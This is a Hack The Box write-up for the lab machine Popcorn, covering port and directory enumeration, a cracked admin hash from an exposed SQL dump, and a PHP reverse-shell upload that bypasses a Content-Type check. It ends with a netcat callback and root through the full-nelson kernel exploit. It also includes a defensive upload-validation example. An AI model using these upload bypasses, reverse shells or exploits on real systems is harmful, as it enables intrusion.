Popcorn

tags: HTB Medium Linux OSCP
Platform: Hackthebox
Difficulty: Medium
OS: Linux

Enumeration

Nmap

To get started, we run a quick scan for open ports.

$ nmap -p- -T4 10.10.10.6
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-07 18:26 CEST
Nmap scan report for 10.10.10.6
Host is up (0.095s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 26.41 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,80 10.10.10.6
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-07 18:38 CEST
Nmap scan report for 10.10.10.6
Host is up (0.096s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn´t have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.17 - 2.6.36 (95%), Linux 2.6.30 (95%), Linux 2.6.32 (95%), Linux 2.6.35 (95%), Linux 2.4.20 (Red Hat 7.2) (95%), Linux 2.6.17 (95%), AVM FRITZ!Box FON WLAN 7240 WAP (94%), Canon imageRUNNER ADVANCE C3320i or C3325 copier (94%), Android 2.3.5 (Linux 2.6) (94%), Epson WF-2660 printer (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   96.47 ms 10.10.14.1
2   96.58 ms 10.10.10.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.01 seconds

Port 80

Gobuster

$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.6/ -x php,txt,zip,rar,tar,bak -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.6/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,zip,rar,tar,bak
[+] Timeout:        10s
===============================================================
2021/05/07 18:40:59 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.zip (Status: 403)
/.htaccess.rar (Status: 403)
/.htaccess.tar (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.zip (Status: 403)
/.htpasswd.rar (Status: 403)
/.htpasswd.tar (Status: 403)
/.htpasswd.bak (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/cgi-bin/ (Status: 403)
/index (Status: 200)
/rename (Status: 301)
/test (Status: 200)
/test.php (Status: 200)
/torrent (Status: 301)
===============================================================
2021/05/07 18:45:41 Finished
===============================================================

Well, test.php exposes the output of the phpinfo() function, torrent holds a Torrent Hoster installation, and rename contains an API that allows us to rename files.

Torrent Hoster

Let's enumerate this directory.

Gobuster

$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.6/torrent/ -x php,txt,torrent -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.6/torrent/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,torrent
[+] Timeout:        10s
===============================================================
2021/05/07 19:12:59 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.torrent (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.torrent (Status: 403)
/admin (Status: 301)
/browse (Status: 200)
/browse.php (Status: 200)
/comment (Status: 200)
/comment.php (Status: 200)
/config (Status: 200)
/config.php (Status: 200)
/css (Status: 301)
/database (Status: 301)
/download (Status: 200)
/download.php (Status: 200)
/edit (Status: 200)
/edit.php (Status: 200)
/health (Status: 301)
/hide (Status: 200)
/images (Status: 301)
/index (Status: 200)
/index.php (Status: 200)
/js (Status: 301)
/lib (Status: 301)
/login (Status: 200)
/login.php (Status: 200)
/logout (Status: 200)
/logout.php (Status: 200)
/preview (Status: 200)
/readme (Status: 301)
/rss (Status: 200)
/rss.php (Status: 200)
/secure (Status: 200)
/secure.php (Status: 200)
/stylesheet (Status: 200)
/templates (Status: 301)
/thumbnail (Status: 200)
/thumbnail.php (Status: 200)
/torrents (Status: 301)
/torrents.php (Status: 200)
/upload (Status: 301)
/upload.php (Status: 200)
/upload_file (Status: 200)
/upload_file.php (Status: 200)
/users (Status: 301)
/validator (Status: 200)
/validator.php (Status: 200)
===============================================================
2021/05/07 19:15:42 Finished
===============================================================

Inside database we find a SQL dump that contains the admin user's credentials.

-- 
-- Table structure for table `users`
-- 

CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL auto_increment,
  `userName` varchar(40) NOT NULL default '',
  `password` varchar(40) NOT NULL default '',
  `privilege` varchar(10) NOT NULL default '',
  `email` varchar(30) NOT NULL default '',
  `joined` datetime NOT NULL default '0000-00-00 00:00:00',
  `lastconnect` datetime NOT NULL default '0000-00-00 00:00:00',
  PRIMARY KEY  (`id`),
  UNIQUE KEY `userName` (`userName`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=4 ;

-- 
-- Dumping data for table `users`
-- 

INSERT INTO `users` VALUES (3, 'Admin', '1844156d4166d94387f1a4ad031ca5fa', 'admin', '[email protected]', '2007-01-06 21:12:46', '2007-01-06 21:12:46');

And now, with CrackStation we can recover the plaintext behind the password hash.

1844156d4166d94387f1a4ad031ca5fa : md5 : admin12

But it is not correct... Since we can see that registration is open, let's register an account.

Now we can upload a torrent file, then edit its properties and upload a screenshot for it. We will try to upload a shell instead of an image.

Exploitation

Getting shell

To upload our PHP shell instead of an image, we intercept the upload with Burp and change the Content-Type of the file part from application/x-php to image/gif; the upload is accepted because the server trusts this client-supplied header.

POST /torrent/upload_file.php?mode=upload&id=df05aca78528ff7075b4c471d5795c136171f4b3 HTTP/1.1
[...]

-----------------------------10515614755774646911643331688
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-php

<?php
    set_time_limit (0);
    $VERSION = '1.0';
    $ip = '10.10.14.22';
    $port = 8787;
[...]

POST /torrent/upload_file.php?mode=upload&id=df05aca78528ff7075b4c471d5795c136171f4b3 HTTP/1.1
[...]

-----------------------------10515614755774646911643331688
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/gif

<?php
    set_time_limit (0);
    $VERSION = '1.0';
    $ip = '10.10.14.22';
    $port = 8787;
[...]

We forward the request and see that the "image" has been uploaded successfully.

Upload: shell.php
Type: image/gif
Size: 2.181640625 Kb
Upload Completed.
Please refresh to see the new screenshot.
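
The bypass works because the application only looks at the Content-Type the client sends. As an added example (my code, not Torrent Hoster's), this is how a screenshot-upload check for a PHP application like this one validates the actual file bytes instead; validateScreenshot() and the upload path are assumed names.

```php
<?php
// Added example, not Torrent Hoster's code. Replaces the Content-Type-only
// check behind upload_file.php with server-side validation of the bytes.
// validateScreenshot() and $uploadDir are assumed names.
declare(strict_types=1);

// Returns a safe destination filename, or null if the upload is rejected.
// $file is one entry of $_FILES (name, type, tmp_name, error, size).
function validateScreenshot(array $file, int $maxBytes = 2097152): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || $file['size'] > $maxBytes
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    // 1. Extension allowlist on the client filename: shell.php is rejected
    //    here no matter what Content-Type the client claims.
    $allowed = ['gif' => 'image/gif', 'png' => 'image/png',
                'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg'];
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;
    }

    // 2. Sniff the MIME type from the file's bytes (libmagic); $file['type']
    //    is the header that was rewritten in the proxy and is ignored.
    $realMime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($realMime !== $allowed[$ext]) {
        return null;
    }

    // 3. The content must decode as an image; a PHP script does not.
    if (@getimagesize($file['tmp_name']) === false) {
        return null;
    }

    // 4. Never keep the client filename: random name, server-chosen extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Handler side. The directory must be configured so scripts never execute.
$uploadDir = '/var/www/torrent/upload/';   // assumed path
$name = validateScreenshot($_FILES['file'] ?? []);
if ($name === null) {
    http_response_code(400);
    exit('Upload rejected.');
}
move_uploaded_file($_FILES['file']['tmp_name'], $uploadDir . $name);
```

Even with this check, the screenshot directory should not execute scripts at all (with Apache and mod_php, php_admin_flag engine off in that directory's Directory block), so a file that slips through is served as data rather than run.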

Now we just have to start a listener, reload the torrent's properties page and click on the banner where the image would be displayed.

$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.6] 57005
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 00:14:05 up 40 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
www-data@popcorn:/$ cd /home
www-data@popcorn:/home$ ls
george
www-data@popcorn:/home$ cd george/
www-data@popcorn:/home/george$ ls
torrenthoster.zip  user.txt
www-data@popcorn:/home/george$ cat user.txt 
CENSORED_FLAG
www-data@popcorn:/home/george$

Post exploitation

Privilege escalation: www-data to root

Linux exploit suggester

Well, let's see which exploits linux-exploit-suggester.sh suggests for this system.

www-data@popcorn:/tmp$ ./linux-exploit-suggester.sh 

Available information:

Kernel version: 2.6.31
Architecture: i686
Distribution: ubuntu
Distribution version: 9.10
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

76 kernel space exploits
48 user space exploits

Possible Exploits:

[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson

   Details: http://vulnfactory.org/exploits/full-nelson.c
   Exposure: highly probable
   Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
   Download URL: http://vulnfactory.org/exploits/full-nelson.c
[...]

The full-nelson exploit looks like it's going to give us good results!

We upload the exploit to the system, compile it and execute it.

www-data@popcorn:/tmp$ gcc full-nelson.c -o full-nelson
www-data@popcorn:/tmp$ ./full-nelson 
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf8426280
 [+] Resolved econet_ops to 0xf8426360
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root)
# cd /root
# cat root.txt
CENSORED_FLAG
#